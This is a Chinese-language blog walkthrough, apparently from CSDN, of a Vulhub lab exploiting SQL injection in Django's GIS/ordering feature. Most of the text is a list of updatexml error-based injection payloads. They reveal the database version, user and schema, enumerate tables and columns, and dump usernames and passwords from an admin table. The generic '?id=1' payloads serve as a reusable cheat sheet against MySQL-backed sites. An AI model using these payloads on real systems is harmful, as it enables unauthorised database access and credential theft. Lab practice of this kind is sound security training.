Vulhub-django GIS SQL注入漏洞

最新推荐文章于 2024-05-03 15:29:51 发布

shayebudon

最新推荐文章于 2024-05-03 15:29:51 发布

阅读量1k

点赞数

文章标签： django sql python

本文链接：https://blog.csdn.net/shayebudon/article/details/121931117

版权

SQL注入 updatexml 数据库信息安全漏洞信息泄露

关键词由CSDN通过智能技术生成

首先转到列表视图：http://your-ip:8000/vuln/

添加?order=-id到 GET 参数。看到按 id 降序排列的数据。

看到按 id 降序排列的数据。

因此根据这个信息我们可以构造报错注入来进行攻击获取数据信息。
?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23，其中vuln是我们的应用程序和collection模型。

获取用户

updatexml报错注入原理：`concat()`函数是将其连成一个字符串，因此不会符合`XPath_string`的格式，因此会造成格式错误
`0x7e` ASCII码，实为`~`，updatexml报错为特殊字符、字母及之后的内容，为了防止前面的字母丢失，开头连接一个特殊字符

、

爆数据库版本信息
?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

链接用户
?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)

链接数据库
?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

爆库
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)

爆表
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)

爆字段
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)

爆字段内容
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

爆表名
?id=1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#
爆列名
?id=1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name="users")),1)#
爆字段
?id=1 and updatexml(1,make_set(3,'~',(select data from users)),1)#

shayebudon

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Vulhub-django GIS SQL注入漏洞

首先转到列表视图：http://your-ip:8000/vuln/添加?order=-id到 GET 参数。看到按 id 降序排列的数据。看到按 id 降序排列的数据。因此根据这个信息我们可以构造报错注入来进行攻击获取数据信息。?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23，其中vuln是我们的应用程序和collection模型。.
复制链接

扫一扫